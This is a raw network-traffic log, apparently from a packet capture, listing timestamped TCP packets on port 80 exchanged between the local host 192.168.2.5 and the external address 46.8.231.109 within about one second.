Sep 27, 2024 00:15:07.072488070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072506905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072506905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072510958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072534084 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072535038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072557926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072573900 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072573900 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072582960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072601080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072607040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072638035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072652102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072783947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072798014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072812080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072825909 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072839975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072844982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072844982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072858095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072880030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072894096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072897911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072897911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072906971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072921038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072935104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072935104 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072948933 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072962999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072962999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072976112 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.072977066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.072990894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073004961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073018074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073019028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073019028 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073034048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073048115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073050976 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073061943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073066950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073076010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073088884 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073101997 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073115110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073128939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073132038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073132038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073143005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073184967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073184967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073564053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073580027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073592901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073606968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073612928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073620081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073635101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073635101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073648930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073663950 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073682070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073682070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073685884 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073699951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073700905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073712111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073733091 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073744059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073748112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073764086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073779106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073787928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073787928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073792934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073807001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073822021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073834896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073837042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073837042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073848963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073863983 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073877096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073890924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073890924 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073890924 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073904991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073904991 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073919058 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073930979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073944092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073957920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.073961973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073961973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.073973894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074009895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074009895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074019909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074502945 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074518919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074531078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074558973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074558973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074579954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074603081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074625015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074626923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074626923 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074639082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074640036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074654102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074667931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074681044 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074681044 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074682951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074695110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074696064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074711084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074719906 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074724913 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074739933 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074753046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074767113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074769974 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074769974 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074780941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074795008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074810028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074824095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074826002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074826002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074837923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074852943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074867010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074872017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074882030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074891090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074891090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074896097 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.074944019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.074944019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075134039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075150013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075162888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075176954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075191975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075193882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075193882 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075237989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075237989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075454950 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075469017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075481892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075495958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075498104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075510025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075514078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075525999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075540066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075553894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075567961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075572014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075572014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075588942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075601101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075603962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075617075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075630903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075638056 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075638056 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075645924 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075660944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075675011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075690031 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075694084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075695992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075707912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075722933 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075725079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075736046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075751066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075759888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075759888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075763941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075779915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075793982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075797081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075809002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075809956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075823069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075836897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075850010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075864077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075864077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075865030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075879097 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.075896978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075932980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.075932980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.076380014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076394081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076416016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076430082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076440096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.076440096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.076445103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076459885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076472998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.076472998 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.076473951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076488018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076500893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076514959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076523066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.076529980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076544046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076558113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076561928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.076561928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.076571941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076586008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076592922 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.076601028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076615095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.076618910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.076641083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.076749086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.155533075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155555010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155570030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155627966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155642986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155658960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155667067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.155730963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155746937 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155761003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155777931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155778885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.155778885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.155792952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155816078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.155844927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155849934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.155849934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.155860901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155877113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155890942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155900002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.155900002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.155905008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155915022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.155920029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155935049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.155942917 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.155981064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156049013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156064987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156079054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156094074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156110048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156117916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156117916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156126022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156155109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156202078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156232119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156246901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156260967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156282902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156287909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156297922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156301022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156311989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156322956 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156328917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156341076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156373978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156373978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156400919 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156658888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156675100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156691074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156702995 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156718016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156742096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156800032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156815052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156827927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.156846046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156860113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.156886101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158235073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158251047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158268929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158291101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158293009 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158314943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158318043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158346891 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158365011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158374071 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158381939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158396959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158413887 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158430099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158457041 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158466101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158480883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158497095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158512115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158523083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158523083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158529043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158536911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158544064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158576012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158576012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158710003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158725977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158740044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158754110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158756018 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158768892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158781052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158783913 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158802032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.158814907 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.158835888 CEST	49708	80	192.168.2.5	46.8.231.109
